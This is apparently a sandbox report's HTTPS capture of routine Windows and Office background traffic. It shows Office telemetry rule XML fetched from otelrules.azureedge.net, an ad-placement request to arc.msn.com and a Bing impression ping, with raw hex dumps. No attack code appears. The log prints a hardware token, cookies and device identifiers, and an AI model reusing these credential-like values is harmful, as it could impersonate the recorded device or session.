                                                                                                                                                                                                            2024-11-21 14:17:47 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:47 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 474
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                                                            x-ms-request-id: 302889d7-401e-0047-2e63-3b8597000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141747Z-178bfbc474bscnbchC1NYCe7eg00000001s000000000avkg
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:47 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            101192.168.2.64982220.223.35.26443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:47 UTC2614OUTGET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=88000045&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241121T141744Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=811b8ccc6679466eb8851725c78cd000&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=595199&metered=false&nettype=ethernet&npid=sc-88000045&oemName=xtfsrp%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=xtfsrp20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=595199&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1& [TRUNCATED]
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                            X-SDK-CACHE: cid=128000000001627409&chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6
                                                                                                                                                                                                            X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAZ1hoi1TzaYpzVzVd+YEO56cZ06MOdgqXgXAos1MJlN20gETlA48eLOMymFJLsl3BR1xoa0l1AqAc1pL5sh92Wgv6yvNuk1kRRInCLjTHwSOB+mN4vbAGUcSb2inNrqBd6MrjdXVkRBeP9lXgilXe2QNa1DQCAM3N2SEx7JT5JOBvnF2NZjoOYwIm+8ouLgbnZrw8Z8oab5XNr1HLO65qqsvrynoNCHPogROjeI7uCNqb4bGLh6mXzcbfXd/B+iLou/WeT0DyeHD7YG8I/ToyDfN3baS69B6WQAwym8CSQ4ZGFVnHigaFfNozHq/m68FrSCq9Xv8TsYixg0Dz4ydktUQZgAAENsn+FRgDYzoKBOtorl4m9+wAapqjQaDu+Dz+yVDGoijJGrwI+6mOv664qFYWyNpBwuFyN4OdbOEpMfpuY2ZbDeSLuh6HFg4P4/gSythZxQsr8wwLZrL7UxeGeBGLRE1GjFb0XgG2VFXdT67wmiNey8AH+0+m765xGPQvwy5Scuvl8aVDmqCzhvAV4keSNAiO2zOGhim3Os88URW5QivJrK5A1B2HRNAt8VaUZp3fYAkBSa2wvL02sGuMG9Hi/sZPE174dpatWV7tRwBaKyN0exLVGaacui0/CgALd71JhdDj1Gz1l7Wwb+0C6lKHirvEHmlLp74U8tl5ywjNsW0JZcK1ti63RmJoMtxxclpLtUG9Smc4PpdMpGAcRXKEysRk1jjspgc01o6F6RoQsMMLImPyvhGK8VkLXoCT+HhU4g0W2sP/z4fEB1JnjvGdcHL3VHB6qyY54yA3I8bo2DccoyYV/Q1geED7tkJidBeEQDK+Mw/IUOmLEpzPZs7N3C7+xkLt3oAICwbZh2mZ5DAZpFyolUFsQXtfX2jpJZ2BR82Tr+TH1kmH67fDoLLv6ojmAgYVDUL3hfqUzIkgtj6QrnfQdcB&p=
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            MS-CV: 7mKNM1Tl1UG+yoGB.0
                                                                                                                                                                                                            User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                                                                                                                            X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0
                                                                                                                                                                                                            Host: arc.msn.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-11-21 14:17:47 UTC955INHTTP/1.1 200 OK
                                                                                                                                                                                                            Cache-Control: no-store, no-cache
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            Content-Length: 2972
                                                                                                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                            Expires: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                            Server: Microsoft-IIS/10.0
                                                                                                                                                                                                            ARC-RSP-DBG: [{"RADIDS":"1,P425116216-T1-C128000000001627409+B+P10+S1"},{"OPTOUTSTATE":"65792"},{"REGIONALPOLICY":"1"}]
                                                                                                                                                                                                            X-ARC-SIG: EvIMNfPsb2udBFIGbjLwAbqP5adm/Ij2w1UcZ0EyW5ZEUeFelRYav6EvPbgwwkyLZf6ICSo6o7J1Ist/pGzZf3FeUchYuITUffeoDaFB/EEJMoBjynfxNw94LmN8QWARRnBoMuKstlAxpT4s9uXQSzacWyYigcQ/2vVvB5vM+pPgYiyS3kwWJNKPYocJBPQdqG64fhk0WQdUWId40FLYeJhySDVV5e5SBE//RszR0FbL9NCPJUsZ4RLYsaiTp8DN+j0Lp84ncptPnLINhaHb3cQtlhbbtpuNCGiqNY/RJ0yBm6fmkBkkeZPOIdsL/JE2zaxd7cgSQTEnwwtZoe0YQg==
                                                                                                                                                                                                            Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version
                                                                                                                                                                                                            X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:46 GMT
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            2024-11-21 14:17:47 UTC2972INData Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 69 74 65 6d 50 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6e 6f 4f 70 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 61 63 74 69 6f 6e 5c 22 7d 7d 2c 5c 22 69 74 65 6d 73 5c 22 3a 5b 7b 5c 22 70 72 6f 70 65 72 74 69
                                                                                                                                                                                                            Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"itemPropertyManifest\":{\"noOp\":{\"type\":\"action\"}},\"items\":[{\"properti


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            102192.168.2.64982513.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:48 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:49 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                                                            x-ms-request-id: d5b120ed-d01e-0017-3f65-3bb035000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141749Z-178bfbc474bmqmgjhC1NYCy16c00000001mg00000000hugd
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:49 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            103192.168.2.649831150.171.27.10443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:49 UTC822OUTGET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8-rxPAXyoVMIT7WO3fmyzYDVUCUwhOSRqF271Ti6g8BWCwyjXBAKy25hyd8_CTi1NuSmCNn9qyOzRYARW9TPN7DuKIBWrrjD3U_Qy06pFM7ZfyYBTi3TahMjZz7hCNLrUqgNzT5cLK5_bmCHay2tVrl6XE609ivIJVvn1ki0CGUDKtf56%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZm9uZWRyaXZlLmxpdmUuY29tJTJmJTNmb2NpZCUzZGNtbTA3YjdkbnU0%26rlid%3Db5427d1f27bf1c3838471a2067559285&TIME=20241121T141739Z&CID=531098720&EID=&tids=15000&adUnitId=11730597&localId=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&deviceId=6966555320912735&anid=DA18C8825356BAC4E7B23066FFFFFFFF HTTP/1.1
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                            User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                                                                                                                            Host: g.bing.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cookie: MUID=30952A2DA9F56E753E2F3F13A8976F69; _EDGE_S=SID=1B1737814BED6B923F2F22BF4A416AEE; MR=0
                                                                                                                                                                                                            2024-11-21 14:17:49 UTC763INHTTP/1.1 204 No Content
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                            Set-Cookie: MSPTC=oJk2-mHn-Ry-33x_p-2BnYwCgbz56kWl8b8vvFLH2S0; domain=.bing.com; expires=Tue, 16-Dec-2025 14:17:49 GMT; path=/; Partitioned; secure; SameSite=None
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                            X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: 9CA2FB703C3C4764ADAEA7FB9DC237A2 Ref B: EWR30EDGE0911 Ref C: 2024-11-21T14:17:49Z
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:48 GMT
                                                                                                                                                                                                            Connection: close


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            104192.168.2.64982813.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:49 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:49 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 405
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B942B6AFF"
                                                                                                                                                                                                            x-ms-request-id: c9b33041-e01e-0033-176b-3b4695000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141749Z-178bfbc474bmqmgjhC1NYCy16c00000001h000000000rbtu
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:49 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            105192.168.2.64982713.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:49 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:49 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B984BF177"
                                                                                                                                                                                                            x-ms-request-id: 18e5e448-501e-000a-7b67-3b0180000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141749Z-178bfbc474bv7whqhC1NYC1fg400000001kg00000000dx1z
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:49 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            106192.168.2.64983013.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:49 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:49 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 174
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B91D80E15"
                                                                                                                                                                                                            x-ms-request-id: 6a968014-801e-0015-537c-3bf97f000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141749Z-178bfbc474bkvpdnhC1NYCuu2w00000001gg00000000tu0f
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:49 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            107192.168.2.64982913.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:49 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:49 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BBA642BF4"
                                                                                                                                                                                                            x-ms-request-id: 26217b89-b01e-001e-808c-3a0214000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141749Z-178bfbc474bfw4gbhC1NYCunf400000001k000000000gcb9
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:49 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            108192.168.2.64983613.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:51 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:51 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:51 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1952
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
